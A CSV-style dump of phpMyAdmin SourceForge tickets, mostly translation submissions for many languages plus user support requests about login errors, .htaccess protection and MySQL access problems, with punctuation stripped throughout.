"24444","3017",".htaccess NOT working with phpMyAdmin 3.5.3.
Hello Sir Madam, I have installed phpMyAdmin on my Linux CentOS 6 for quite some time.
I had double secured it with .htaccess file in usr share phpMyAdmin And I have suitably modified etc httpd conf.d phpMyAdmin.conf like this lt;Directory usr share phpMyAdmin gt; AllowOverride AuthConfig Order allow,deny Allow from all I regularly do yum update and after my phpMyAdmin upgraded to 3.5.3, this password protection stopped working and NOT ONLY That but it also causes, phpMyAdmin not opening until, you delete .htaccess file from usr share phpMyAdmin I feel insecure without having .htaccess protection.
Other relevant details are as under OS CentOS 6 64 bit architecture PHP version 5.3.3 My SQL Version 5.1.61 PhpMyAdmin Version 3.5.3 Thanking you.
Original URL https sourceforge.net p phpmyadmin support requests 1200 Original author hemang36","bug"
"24444","3018","Exported local host.
I am working on a site at MacHighway.
I was having difficulty in accessing a web site builder and started looking through all the features available in MacHighway s cPanel.
I explored phpmyAdmin and exported local host onto my desktop Mac running Lon).
Now, of course, I am getting access errors and configuration errors and can t do anything.
I ve spent a week with their support and haven t been able to figure out how to restore the file or how to start over.
Can you give me some ideas?
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 1201 Original author literacy","bug"
"24444","3019","Have to click back button several times to navigate.
Say we select a database and we click back button of the browser.Normally it should come to the previouse page.but when going back using the browser back button the page doesn t come to the previous page.But the url get changes.To come the previouse vieded page have to click the back button at least twice.
Original URL https sourceforge.net p phpmyadmin support requests 1202 Original author shamika09 Found in version Latest Git","bug"
"24444","3020","Having trouble connecting to MySQL Database.
My web hosting is on http www.biz.nf and the MySQL server is fdb4.biz.nf connecting via TCP IP).
I ve created a database named 1252729 members by phpMyAdmin and a table named regname.
However, when I try to connect the form and the database on the server it says that I don t have proper authorization or there might be a permission problem.
Could you please look into the problem and give me a solution to this?
The web hosting support told me that I have to contact phpMyAdmin support and nothing he can do).
I ve also attached a picture of the error along with this forum.
Thanks, Bridge and Boardgame Club Chula Original URL https sourceforge.net p phpmyadmin support requests 1203 Original author bbcchula","bug"
"24444","3021","Can t create upper ase databases and Tables.
Is it always the names of databases and tables are in lowercase?Why it s not with upper case names.
See the attachment.
Original URL https sourceforge.net p phpmyadmin support requests 1205 Original author shamika09 Found in version Needs decision Attachment http sourceforge.net p phpmyadmin support requests 1205 attachment lower upper.png","bug"
"24444","3022","more settings page is blank.
hi, when i click on more settings in phpmyadmin home page, I recive a blank page.
I use a Ubuntu server and Apache on oracle vm.
My phpmyadmin version is 3.5.7deb1.precise ppa.1.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 1206 Original author sourcebebo Found in version Latest Git","bug"
"24444","3023","Upgrading from Drupal 6.28 to 7.22.
Dear Sir Madam, I have created my webpage from Drupal 6.28 to 7.22.
Just found out that there is a script problem when upgrading an existing installation PDOException SQLSTATE[42S02] Base table or view not found 1146 Table mattscom sales.system doesn t exist SELECT name, schema version FROM {system} WHERE type = type; Array [ type] => module ) in drupal get installed schema version ) line 155 of home mattscom public html includes install.inc).
It would be appreciated if you can teach me how to solve the problem.
Thanks very much, Matthew Original URL https sourceforge.net p phpmyadmin support requests 1207 Original author khli7 Found in version 3.4.7","bug"
"24444","3024","phpMyAdmin Welcome Screen Error Zend server).
I installed Zend server, Apache and MySQL and then I installed phpMyAdmin.
However all I get on the welcome screen is an error.
I verified that MySQL was working and that correct passwords usernames were correct.
I don t know what else to check.
Error MySQL said Documentation 1045 Access denied for user root localhost using password YES) phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection.
You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.
Your help is greatly appreciated BJ Original URL https sourceforge.net p phpmyadmin support requests 1210 Original author greenpeamedia Found in version 3.4.7","bug"
"24444","3025","WordPress.
Original URL https sourceforge.net p phpmyadmin support requests 1211 Original author michoni Found in version 3.4.7","bug"
"24444","3026","De MySQL 5.0.96 a MySQL 5.1 .
Hola, necesito instalar Joomla 3 que requiere de MySQL 5.1 para funcionar.
El servidor que me aloja dice que estxc3xa1 en MySQL 5.0.96 en la actualidad pero no especifica como hacerlo.
Como hago para actualizar MySQL a la version requerida?
soy novato en esto por favor explicarme en detalle como hacer.
Saludos Original URL https sourceforge.net p phpmyadmin support requests 1212 Original author activado Found in version 3.4.7","bug"
"24444","3027","No tables found in database can t import SQL into PHPMYAdmin.
Hello, I have a website which Im setting up for a client on Hostgator.com I have uploaded the wordpress site edited the wp config file created the database, user and added privileges and when I get into PHPMyAdmin I would usually select the database so I can import the SQL file.
It just says no tables found in database so I can import it.
Can you please tell me how to sort this out Thank you Keith Original URL https sourceforge.net p phpmyadmin support requests 1213 Original author nanopower Found in version 3.4.7","bug"
"24444","3028","App hosted on your server not working..
I have a .net console application hosted on your server is not working from yesterday.The same problem came last week also.Please do the needful as it is very urgent.
Original URL https sourceforge.net p phpmyadmin support requests 1215 Original author dsachdeva Found in version 3.4.7","bug"
"24444","3029","Webuzo phpMyAdmin Stack.
LAMP Appliance from Webuzo includes all you need to run LAMP Linux, Apache, MySQL, PHP Python Perl) together with phpMyAdmin to manage MySQL.
IT is also available in the form of ready to cook VMs.
Webuzo also allows to quickly deploy phpMyAdmin on the AWS Amazon Cloud.
Webuzo maintains the reviews,ratings, demos,screen shots, features on it individual page.
You can download the phpMyAdmin Virtual Appliance here http webuzo.com apps dbtools phpMyAdmin Could you list Webuzo phpMyAdmin Stack on your downloads page to ease user experience ?
Thanks in advance.
Original URL https sourceforge.net p phpmyadmin support requests 1216 Original author valley webuzo Found in version 3.4.7","enhancement"
"24444","3030","Left table frame....
I have no idea at all what info you guys are asking for in the combo boxes listed above.
They all make absolutely no sense to me.
My issue is that in version 4.0.4.2 all of a sudden I have all kinds of icons for my various tables in the left hand frame of phpMyAdmin.
I have no idea what is going on or who hacked me and put these icons in but I have the classic table icon next to most of the table and this little smile face brown icon next to a few.
How do I knwo what caused this icon change and what do I have to do to fix it?
Original URL https sourceforge.net p phpmyadmin support requests 1218 Original author pczero Found in version 3.4.7","bug"
"24444","3031","structure tab not working javascript error.
when i click structure tab for a table, it will show loading and nothing happens.
i open the chrome debuger, it says Uncaught TypeError Cannot read property success of null get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js s =codemirror lib codemirror.js scripts[]=codemirror mode mysql mysql.js 211 Original URL https sourceforge.net p phpmyadmin support requests 1219 Original author sea129 Found in version 3.4.7","bug"
"24444","3032","upd.
swe.
translation.
Finally...
Original URL https sourceforge.net p phpmyadmin translations 1 https sourceforge.net p phpmyadmin translations 1 Original author d nordenberg","bug"
"24444","3033","German translation.
I ve updated the German language file.
I was not really sure how to translate Grant so I let it be.
I think it would be usefull to add seperate variables for the privileges.
Now in German and some other languages you can t differ the privileges delete and drop aka Lxc3xb6schen ).
More usefull would be Tabelle lxc3xb6schen for drop , but the variable strDrop is used in another context where Lxc3xb6schen is the best word.
So the best solution would be seperate variables for the privileges which will be more specific.
And a little bug I found In user details.php3 in line 311 is written Privileges instead of the variable.
Original URL https sourceforge.net p phpmyadmin translations 2 https sourceforge.net p phpmyadmin translations 2 Original author korelstar","bug"
"24444","3034","Spanish Translation.
This is the spanish.inc.php3 file w the translations completed.
There are still a few missing, but I have to check context in order to make sure that they fit.)
Spanish is a tricky language.
Original URL https sourceforge.net p phpmyadmin translations 3 https sourceforge.net p phpmyadmin translations 3 Original author gryzor","bug"
"24444","3035","Updated Czech translations.
I ve updated czech translations...
Original URL https sourceforge.net p phpmyadmin translations 4 https sourceforge.net p phpmyadmin translations 4 Original author nijel","bug"
"24444","3036","slovak translation.
Slovak translation of phpMyAdmin 2.2.0rc3 in iso8859 2.
Original URL https sourceforge.net p phpmyadmin translations 5 https sourceforge.net p phpmyadmin translations 5 Original author erkac","bug"
"24444","3037","Trad.
Chinese Languare Translation.
phpMyAdmin Messages that have been translated into Chinese Big5).
ps.
All of the messages are translated ) Translation file english.inc.php v 1.37 2.2rc3) Translator Taiyen Hung amp;lt;yen789 pchome.com.tw amp;gt; Original URL https sourceforge.net p phpmyadmin translations 6 https sourceforge.net p phpmyadmin translations 6 Original author taiyen","bug"
"24444","3038","Polish translation.
I ve completed the polish translation and fixed some language mistakes.
Original URL https sourceforge.net p phpmyadmin translations 7 https sourceforge.net p phpmyadmin translations 7 Original author ubanus","bug"
"24444","3039","Polish translation again).
I ve update the Polish translation...
Original URL https sourceforge.net p phpmyadmin translations 8 https sourceforge.net p phpmyadmin translations 8 Original author ubanus","bug"
"24444","3040","Galician translation.
I m contributing a Galician translation.
Original URL https sourceforge.net p phpmyadmin translations 9 https sourceforge.net p phpmyadmin translations 9 Original author anonymous","bug"
"24444","3041","Updated Norwegian translation.
Updated Norwegian translation based on Id norwegian.inc.php3,v 1.55 2001 08 30 06 59 39 swix Exp Sven Erik Andersen sven erik.andersen pkf107.no Original URL https sourceforge.net p phpmyadmin translations 10 https sourceforge.net p phpmyadmin translations 10 Original author seasoft","bug"
"24444","3042","Polish translation.
Polish translation Original URL https sourceforge.net p phpmyadmin translations 11 https sourceforge.net p phpmyadmin translations 11 Original author d3xter","bug"
"24444","3043","updated italian.inc.php.
same as subject Original URL https sourceforge.net p phpmyadmin translations 12 https sourceforge.net p phpmyadmin translations 12 Original author danone","bug"
"24444","3044","Greek translations.
I enclose the gree translations fot phpmyadmin 2.2.0 This is the first attempt and I hope there are not many bugs Original URL https sourceforge.net p phpmyadmin translations 13 https sourceforge.net p phpmyadmin translations 13 Original author anonymous","bug"
"24444","3045","Greek translations again.
Looks like Sourceforge doesn t like to recieve files, if not logged in.
So I send the greek translations again.
Original URL https sourceforge.net p phpmyadmin translations 14 https sourceforge.net p phpmyadmin translations 14 Original author teras","bug"
"24444","3046","another italian.inc.php3.
the latest italian translation I hope it s ok) For your convenience, I have placed the new italian words at the ame place than the english version 1 line for the starting comment) bye Dan Original URL https sourceforge.net p phpmyadmin translations 15 https sourceforge.net p phpmyadmin translations 15 Original author danone","bug"
"24444","3047","italian.inc.php3.
strOverhead has been translated strFullText and strPartialText rectified strUseBackquotes rectified.
bye Dan Original URL https sourceforge.net p phpmyadmin translations 16 https sourceforge.net p phpmyadmin translations 16 Original author danone","bug"
"24444","3048","Rename quot;Send quot; to quot;Save as File quot;.
As a non native English speaker, I don t know if amp;quot;send amp;quot; in dump form) is descriptive to you, but for me it isn t. I would rather use amp;quot;Save as File amp;quot; as the label for the option.
Original URL https sourceforge.net p phpmyadmin translations 17 https sourceforge.net p phpmyadmin translations 17 Original author anonymous","bug"
"24444","3049","Finnish translation URL for file).
Uploading files seems to be broken at least for people who can t login).
Get the Finnish translation from http www.visakopu.net finnish.inc.php.txt Visa Original URL https sourceforge.net p phpmyadmin translations 18 https sourceforge.net p phpmyadmin translations 18 Original author anonymous","bug"
"24444","3050","Updated Norwegian translation.
Updated Norwegian translation based on Id norwegian.inc.php3,v 1.64 2001 09 06 22 55 04 loic1 Exp Translated 6 new strings, localised the number thousands separator, number decimal separator, datefmt, day of week and month.
Original URL https sourceforge.net p phpmyadmin translations 19 https sourceforge.net p phpmyadmin translations 19 Original author seasoft","bug"
"24444","3051","new italian translation.
new italian translation oh......I subscribed the translation mailing list.... bye Dan Original URL https sourceforge.net p phpmyadmin translations 20 https sourceforge.net p phpmyadmin translations 20 Original author danone","bug"
"24444","3052","updated italian.inc.php.
like english version, updated strSend with italian equivalent of amp;quot;save as file... amp;quot; bye Dan Original URL https sourceforge.net p phpmyadmin translations 21 https sourceforge.net p phpmyadmin translations 21 Original author danone","bug"
"24444","3053","italian.inc.php3.
strShowAll and strShowTables tr.
bye Dan Original URL https sourceforge.net p phpmyadmin translations 22 https sourceforge.net p phpmyadmin translations 22 Original author danone","bug"
"24444","3054","italian.inc.php3.
updated italian.inc.php3 Original URL https sourceforge.net p phpmyadmin translations 23 https sourceforge.net p phpmyadmin translations 23 Original author danone","bug"
"24444","3055","pippero.
italian.inc.php3 Original URL https sourceforge.net p phpmyadmin translations 24 https sourceforge.net p phpmyadmin translations 24 Original author danone","bug"
"24444","3056","italian.inc.php3.
italian translation Original URL https sourceforge.net p phpmyadmin translations 25 https sourceforge.net p phpmyadmin translations 25 Original author danone","bug"
"24444","3057","pippero.
italian translation Original URL https sourceforge.net p phpmyadmin translations 26 https sourceforge.net p phpmyadmin translations 26 Original author danone","bug"
"24444","3058","italian.inc.php3.
update Original URL https sourceforge.net p phpmyadmin translations 27 https sourceforge.net p phpmyadmin translations 27 Original author danone","bug"
"24444","3059","updated italian.inc.php.
strIndexHasBeenDropped fix Original URL https sourceforge.net p phpmyadmin translations 28 https sourceforge.net p phpmyadmin translations 28 Original author danone","bug"
"24444","3060","updated italian.inc.php.
updates Original URL https sourceforge.net p phpmyadmin translations 29 https sourceforge.net p phpmyadmin translations 29 Original author danone","bug"
"24444","3061","lang russian .
Updates to russian language files Original URL https sourceforge.net p phpmyadmin translations 30 https sourceforge.net p phpmyadmin translations 30 Original author gt2","bug"
"24444","3062","swedish.inc.php updated.
I ve updated the swedish language file.
Thanks, Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 31 https sourceforge.net p phpmyadmin translations 31 Original author bth","bug"
"24444","3063","Swedish update.
Updates to the swedish language file strFlushTable = Rengxc3xb6r tabellen amp;quot;FLUSH amp;quot;) ; strMySQLReloaded = MySQL har startats om.
; strNoFrames = phpMyAdmin fungerar tyvxc3xa4rr endast med webblxc3xa4sare som hanterar ramar.
; strQueryOnDb = SQL frxc4xbaga i databas ; strTableHasBeenFlushed = Tabellen s har rengjorts ; Thanks for a fantastic work with this great tool!
Regards, Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 32 https sourceforge.net p phpmyadmin translations 32 Original author bth","bug"
"24444","3064","italian.inc.php3.
updated Original URL https sourceforge.net p phpmyadmin translations 33 https sourceforge.net p phpmyadmin translations 33 Original author danone","bug"
"24444","3065","italian translation.
another update.....
Original URL https sourceforge.net p phpmyadmin translations 34 https sourceforge.net p phpmyadmin translations 34 Original author danone","bug"
"24444","3066","Updated Finnish translation.
As I said on the translators mailing list, amp;quot;overhead amp;quot; is yet to be translated.
Visa Original URL https sourceforge.net p phpmyadmin translations 35 https sourceforge.net p phpmyadmin translations 35 Original author anonymous","bug"
"24444","3067","lang russian .
some forgotten updates Original URL https sourceforge.net p phpmyadmin translations 36 https sourceforge.net p phpmyadmin translations 36 Original author gt2","bug"
"24444","3068","italian translation.
update Original URL https sourceforge.net p phpmyadmin translations 37 https sourceforge.net p phpmyadmin translations 37 Original author danone","bug"
"24444","3069","italian translation.
update Original URL https sourceforge.net p phpmyadmin translations 38 https sourceforge.net p phpmyadmin translations 38 Original author danone","bug"
"24444","3070","italian translation.
updates Original URL https sourceforge.net p phpmyadmin translations 39 https sourceforge.net p phpmyadmin translations 39 Original author danone","bug"
"24444","3071","russian lang update.
update for russian language Original URL https sourceforge.net p phpmyadmin translations 40 https sourceforge.net p phpmyadmin translations 40 Original author gt2","bug"
"24444","3072","polish translation.
Updated Polish translation....
Original URL https sourceforge.net p phpmyadmin translations 41 https sourceforge.net p phpmyadmin translations 41 Original author ubanus","bug"
"24444","3073","Error text in Polish Translation.
Correct text is in attach file polishupdatelang.inc.
Original URL https sourceforge.net p phpmyadmin translations 42 https sourceforge.net p phpmyadmin translations 42 Original author regdos","bug"
"24444","3074","italian update.
updated Original URL https sourceforge.net p phpmyadmin translations 43 https sourceforge.net p phpmyadmin translations 43 Original author danone","bug"
"24444","3075","italian.
update!
Original URL https sourceforge.net p phpmyadmin translations 44 https sourceforge.net p phpmyadmin translations 44 Original author danone","bug"
"24444","3076","polish translation.
I ve updated the Polish translation...
Original URL https sourceforge.net p phpmyadmin translations 45 https sourceforge.net p phpmyadmin translations 45 Original author ubanus","bug"
"24444","3077","Fixed Finnish language file.
Strings strMoveTable and strUsers had errors.
These are now fixed.
Visa visa visakopu.net Original URL https sourceforge.net p phpmyadmin translations 46 https sourceforge.net p phpmyadmin translations 46 Original author anonymous","bug"
"24444","3078","italian.
update bye dan Original URL https sourceforge.net p phpmyadmin translations 47 https sourceforge.net p phpmyadmin translations 47 Original author danone","bug"
"24444","3079","Updated german language lib.
Changed the umlauts to the proper html entities Original URL https sourceforge.net p phpmyadmin translations 48 https sourceforge.net p phpmyadmin translations 48 Original author mhauptma73","bug"
"24444","3080","updated italian library.
bye danone Original URL https sourceforge.net p phpmyadmin translations 49 https sourceforge.net p phpmyadmin translations 49 Original author danone","bug"
"24444","3081","polish update.
an updated polish translation...
Original URL https sourceforge.net p phpmyadmin translations 50 https sourceforge.net p phpmyadmin translations 50 Original author ubanus","bug"
"24444","3082","Ukrainian languade file.
I have translated current cvs English language file in Ukrainian win 1251 encoding).
Translated languade file is attached to this message.
Looking forward to further cooperation.
Regards, Marco Original URL https sourceforge.net p phpmyadmin translations 51 https sourceforge.net p phpmyadmin translations 51 Original author anonymous","bug"
"24444","3083","ukrainian win1251.inc.php.
There was a problem with attachment to prevoius message.
Sorry.
Try again.
Marco amp;lt;marco meduniv.lviv.ua amp;gt; Original URL https sourceforge.net p phpmyadmin translations 52 https sourceforge.net p phpmyadmin translations 52 Original author anonymous","bug"
"24444","3084","ru lang updates.
as usally.
my first try use of wincvs for making diff Original URL https sourceforge.net p phpmyadmin translations 53 https sourceforge.net p phpmyadmin translations 53 Original author gt2","bug"
"24444","3085","Chinese BIG5 lang updated.. i have translated most of the english in the original language file.
and also changed little translation from original translator by mr. Hung.
comments pls email me.
Original URL https sourceforge.net p phpmyadmin translations 54 https sourceforge.net p phpmyadmin translations 54 Original author siusun","bug"
"24444","3086","German translation.
Hi there, I corrected strLogin of the German translation.
As I noticed, this string is displayed on the login button when using cookie authentification mode.
It was translated as amp;quot;Benutzername amp;quot; == amp;quot;user name amp;quot;) and that doesn t fit at all ) I changed it back to amp;quot;Login amp;quot;.
This word is used on most German websites in simular circumstanses.
Hope I could help you, Rabus Original URL https sourceforge.net p phpmyadmin translations 55 https sourceforge.net p phpmyadmin translations 55 Original author rabus","bug"
"24444","3087","windows 1250 slovak translation.
From Peter Svec amp;lt;petko at unitra.sk amp;gt; Hi, In phpMyAdmin 2.2.3 is support for Slovak language but only ISO code page.
Many users use windows and windows has windows 1250 code page.
I m sending you slovak language in code page 1250.
Peter Svec Loxc4x8fc Original URL https sourceforge.net p phpmyadmin translations 56 https sourceforge.net p phpmyadmin translations 56 Original author loic1","bug"
"24444","3088","German translation strDropDB, strDeleteUserMessage).
Hello again, Please change strDropDB in the German language file into this strDropDB = Datenbank s lxc3xb6schen ; That would sound much better ) Thanks, Rabus Original URL https sourceforge.net p phpmyadmin translations 57 https sourceforge.net p phpmyadmin translations 57 Original author rabus","bug"
"24444","3089","German strDatabaseWildcard).
I translated the string Loxc4x8fc added a few minutes ago.
strNewDb = Neue Datenbank ; Original URL https sourceforge.net p phpmyadmin translations 58 https sourceforge.net p phpmyadmin translations 58 Original author rabus","bug"
"24444","3090","italian strNewDb).
updated italian translation Original URL https sourceforge.net p phpmyadmin translations 59 https sourceforge.net p phpmyadmin translations 59 Original author danone","bug"
"24444","3091","italian strDatabaseWildcard).
updated Original URL https sourceforge.net p phpmyadmin translations 60 https sourceforge.net p phpmyadmin translations 60 Original author danone","bug"
"24444","3092","Lang File PT).
This is a phpMyAdmin STANDART PORTUGUESE PT) fully translated version from the english file working with v2.2.3 Original URL https sourceforge.net p phpmyadmin translations 61 https sourceforge.net p phpmyadmin translations 61 Original author loisv","bug"
"24444","3093","German strChangePassword).
strChangePassword = Kennwort xc3xa4ndern ; Original URL https sourceforge.net p phpmyadmin translations 62 https sourceforge.net p phpmyadmin translations 62 Original author rabus","bug"
"24444","3094","Chinese BIG5 lang updated.. updated up to 5 mar cvs Original URL https sourceforge.net p phpmyadmin translations 63 https sourceforge.net p phpmyadmin translations 63 Original author siusun","bug"
"24444","3095","italian strChangePassword).
italian updates Original URL https sourceforge.net p phpmyadmin translations 64 https sourceforge.net p phpmyadmin translations 64 Original author danone","bug"
"24444","3096","updated czech translation.
translation containing strChangePassword Original URL https sourceforge.net p phpmyadmin translations 65 https sourceforge.net p phpmyadmin translations 65 Original author nijel","bug"
"24444","3097","Error in Finnish translation.
strCheckAll has wrong translation at the moment.
It should be this strCheckAll = Valitse kaikki ; Visa visa visakopu.net Original URL https sourceforge.net p phpmyadmin translations 66 https sourceforge.net p phpmyadmin translations 66 Original author anonymous","bug"
"24444","3098","German strPmaUriError).
strPmaUriError = Das amp;lt;tt amp;gt; cfgPmaAbsoluteUri amp;lt; tt amp;gt; Verzeichnis MUSS in Ihrer Konfigurationsdatei angegeben werden!
; Original URL https sourceforge.net p phpmyadmin translations 67 https sourceforge.net p phpmyadmin translations 67 Original author rabus","bug"
"24444","3099","updated italian library.
updates Original URL https sourceforge.net p phpmyadmin translations 68 https sourceforge.net p phpmyadmin translations 68 Original author danone","bug"
"24444","3100","Czech translation amp; one suggestion.
Hi here is updated czech translation.
There are more changes than just added message.
As I was checking some messages, I couldn t find anywhere strSequence message being used so it could be removed... Maybe there are more, but this I found.
Nijel Original URL https sourceforge.net p phpmyadmin translations 69 https sourceforge.net p phpmyadmin translations 69 Original author nijel","bug"
"24444","3101","Estonian language update.
Added strPmaUriError Original URL https sourceforge.net p phpmyadmin translations 70 https sourceforge.net p phpmyadmin translations 70 Original author finsoft","bug"
"24444","3102","Chinese BIG5 lang updated.. add strPmaUriError Original URL https sourceforge.net p phpmyadmin translations 71 https sourceforge.net p phpmyadmin translations 71 Original author siusun","bug"
"24444","3103","strFlushTable missing in Finnish.
For some unknown reason the variable strFlushTable is missing from the Finnish language file.
Here it is now strFlushTable = Tyhjennxc3xa4 taulun vxc3xa4limuisti amp;quot;FLUSH amp;quot;) ; Visa visa visakopu.net Original URL https sourceforge.net p phpmyadmin translations 72 https sourceforge.net p phpmyadmin translations 72 Original author anonymous","bug"
"24444","3104","Latvian language file.
Hello folks, I would like to contribute a Latvian translation for phpMyAdmin.
I think i made it correctly, tested it in action and corrected all the mistakes found.
Sure you may want to add it to the distribution package.
A line to add to libraries select lang.lib.php lv = amp;gt; array lv|latvian , latvian , lv ), between ko and nl ) WBR Sandis sandisj parks.lv Original URL https sourceforge.net p phpmyadmin translations 73 https sourceforge.net p phpmyadmin translations 73 Original author saaa2002","bug"
"24444","3105","German translation should be revised.
Hi there, A few years ago, we had an orthography reform in Germany.
That s why some German words are now spelled a bit different than before than before that reform.
e.g.
amp;quot;dass amp;quot; instead of amp;quot;daxc3x9f amp;quot;, amp;quot;Delfin amp;quot; istead of amp;quot;delphin amp;quot;) A list of examples for the new German orthography is available on the German page amp;lt;http www.duden.de schreibung beispiele beispiele.ht ml amp;gt;.
phpMyAdmin s German language file partly uses this new spelling, but also uses the old one in some strings.
The second thing is the word amp;quot;you amp;quot; sing.).
There are two ways of translating amp;quot;you amp;quot; into German amp;quot;Sie amp;quot; and amp;quot;du amp;quot;.
amp;quot;Sie amp;quot; is the polite form and amp;quot;du amp;quot; is the impolite form.
When talking to a friend or a child one would use amp;quot;du amp;quot;, otherwise amp;quot;Sie amp;quot;.
I could be compared to amp;quot;vous amp;quot; and amp;quot;tu amp;quot; in the French language.
phpMyAdmin uses both !)
forms, sometimes amp;quot;Sie amp;quot;, sometimes amp;quot;du amp;quot;.
imho only one form should be used in all strings.
Since the French file always uses the polite form amp;quot;vous amp;quot;, I d suggest to use amp;quot;Sie amp;quot; in the German file.
These are the main reason why imho the German language file should be revised completely.
I know that it s a lot of work to do and I would help, but first I need to know if you are interested in a revision of the file.
Regards, Rabus Original URL https sourceforge.net p phpmyadmin translations 74 https sourceforge.net p phpmyadmin translations 74 Original author rabus","bug"
"24444","3106","Estonian language update.
Fixed some mistyped and some misplaces translations Original URL https sourceforge.net p phpmyadmin translations 75 https sourceforge.net p phpmyadmin translations 75 Original author finsoft","bug"
"24444","3107","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 76 https sourceforge.net p phpmyadmin translations 76 Original author danone","bug"
"24444","3108","[Phpmyadmin translators] for 2.. Brazilian Portuguese Translation strReferentialIntegrity = Verificar integridade referencial ; Original URL https sourceforge.net p phpmyadmin translations 77 https sourceforge.net p phpmyadmin translations 77 Original author anonymous","bug"
"24444","3109","Translation for 2.2.6. estonian translation amp;gt; strReferentialIntegrity = Kontrolli pxc3xa4rinevust ; Original URL https sourceforge.net p phpmyadmin translations 78 https sourceforge.net p phpmyadmin translations 78 Original author finsoft","bug"
"24444","3110","Indonesian Translation for phpMyAdmin 2.
Indonesian Translation for phpMyAdmin 2.2.5 Original URL https sourceforge.net p phpmyadmin translations 79 https sourceforge.net p phpmyadmin translations 79 Original author anonymous","bug"
"24444","3111","Dutch translation started by me.
Or is it finished yet?
Original URL https sourceforge.net p phpmyadmin translations 80 https sourceforge.net p phpmyadmin translations 80 Original author peter101","bug"
"24444","3112","Updated Danish translation.
From Niels Oesten amp;lt;niels at oesten.dk amp;gt; Original URL https sourceforge.net p phpmyadmin translations 81 https sourceforge.net p phpmyadmin translations 81 Original author loic1","bug"
"24444","3113","Updated czech translation.
Here is updated czech traslation Michal Cihar Original URL https sourceforge.net p phpmyadmin translations 82 https sourceforge.net p phpmyadmin translations 82 Original author nijel","bug"
"24444","3114","Lithuanian language file for 2.2.5.
Lithuanian language file for phpMyAdmin 2.2.5 Modify libraries select lang.lib.php file.
Add new value to Language aray lt = amp;gt; array lt|lithuanian , lithuanian , lt ) Original URL https sourceforge.net p phpmyadmin translations 83 https sourceforge.net p phpmyadmin translations 83 Original author algisv","bug"
"24444","3115","Dutch translation.
I could do the Dutch translation or at least part of it), so just mail me via sourceforge, username mwvdlee) the files to edit and instructions on how to work with them and I ll do it.
Original URL https sourceforge.net p phpmyadmin translations 84 https sourceforge.net p phpmyadmin translations 84 Original author mwvdlee","bug"
"24444","3116","serbian translation.
me and my friend translated mysql to serbian language.. can You put now serbian language in standard phpMyAdmin distribution ??
line for select lang.lib.php3 sr win1250 = amp;gt; array sr|serbian , serbian win1250 , sr ) ==== translation file is in attachment ==== Igor Mladenovic mligor zimco.com) and David Trajkovic tdavid ptt.yu) Original URL https sourceforge.net p phpmyadmin translations 85 https sourceforge.net p phpmyadmin translations 85 Original author mligor","bug"
"24444","3117","Greek Translation.
Hey guys, here s the greek translation file.
I used the old translation as a base, so that the existing users won t find something totally new.
However, I updated many strings that were translated incorrectly, and translated the new strings too.
However, I must admit that I m not 100 happy with it, so I may post a new one later on.
Still, it s fully working except if I managed to miss something I didn t translate).
Let me know if you need something more.
Best regards, Kyriakos Original URL https sourceforge.net p phpmyadmin translations 86 https sourceforge.net p phpmyadmin translations 86 Original author theremon","bug"
"24444","3118","thai translation offer.
Currently living in Thailand and studying the native laungage.
I was woundering if you have any thai translaters?
If not then would you appriciate some help.
Khop khun khap sawasdee Greg greg farratech.org Original URL https sourceforge.net p phpmyadmin translations 87 https sourceforge.net p phpmyadmin translations 87 Original author gregf","bug"
"24444","3119","Arabic translation offer.
Could do them.
Original URL https sourceforge.net p phpmyadmin translations 88 https sourceforge.net p phpmyadmin translations 88 Original author anonymous","bug"
"24444","3120","Korean translation.
Not complete.
But much improved than older version.
Original URL https sourceforge.net p phpmyadmin translations 90 https sourceforge.net p phpmyadmin translations 90 Original author anonymous","bug"
"24444","3121","chinese BIG5 and GB translation.
i am working on Chinese GB Translation and will submit the file with some transation update on Chinese BIG5 soon.
hope on these two days.
Original URL https sourceforge.net p phpmyadmin translations 89 https sourceforge.net p phpmyadmin translations 89 Original author siusun","bug"
"24444","3122","Korean translation, again!.
Sorry.
I m not good at SF.
Here is my work, and I ll do the remain later.
Original URL https sourceforge.net p phpmyadmin translations 91 https sourceforge.net p phpmyadmin translations 91 Original author anonymous","bug"
"24444","3123","Kurdish language offer.
We want to traslate phpmyadmin to Kurdish Language which spoken by nearly 50 billion people.
But we are new here and we dont know how is the procedure.
Please write back.
Thanks and Good Luck Kurdish Web Team Original URL https sourceforge.net p phpmyadmin translations 92 https sourceforge.net p phpmyadmin translations 92 Original author anonymous","bug"
"24444","3124","Korean translation, minor update!.
I changed some words, but the difference is small.
Traslation ratio ?)
is 95 , I think.
I can t find where is some words used. )
Original URL https sourceforge.net p phpmyadmin translations 93 https sourceforge.net p phpmyadmin translations 93 Original author woosuhan","bug"
"24444","3125","Italian translation improvements.
Hi, I suggest some changes in the Italian translation.
Referring to Release 2.2.6 rc2 File lang italian.inc.php Comparing italian.inc.php To italian.inc.php.backup ==== ==== 169 amp;lt;!
strKill = Elimina ; !
amp;gt; strKill = Uccidi ; 201 amp;lt;!
strNoFrames = phpMyAdmin funziona meglio con browser che supportano frames ; !
amp;gt; strNoFrames = phpMyAdmin xc4x8d pixc5xaf amichevole con un browser che supporta i frames ; 220 amp;lt;!
strOr = Oppure ; !
amp;gt; strOr = O ; 235 amp;lt;!
strPrimaryKeyName = Il nome della chiave primaria deve essere... PRIMARY!
; 236 amp;lt;!
strPrimaryKeyWarning = amp;quot;PRIMARY amp;quot; amp;lt;b amp;gt;deve amp;lt; b amp;gt; essere il nome di, e amp;lt;b amp;gt;solo di amp;lt; b amp;gt;, una chiave primaria!)
; !
amp;gt; strPrimaryKeyName = Il nome della chiave primaria deve essere... PRIMARIO!
; !
amp;gt; strPrimaryKeyWarning = amp;quot;PRIMARIO amp;quot; amp;lt;b amp;gt;deve amp;lt; b amp;gt; essere il nome di, e amp;lt;b amp;gt;solo di amp;lt; b amp;gt;, una chiave primaria!)
; 169 Elimina translates to hide and remove , as uccidi is kill and is used in Italian only for animals and humans, but not for records.
201 A program is not pixc5xaf amichevole it s a thing, not a person, so it is not sympathetic but runs better = funziona meglio .
220 Only a cosmetic change.
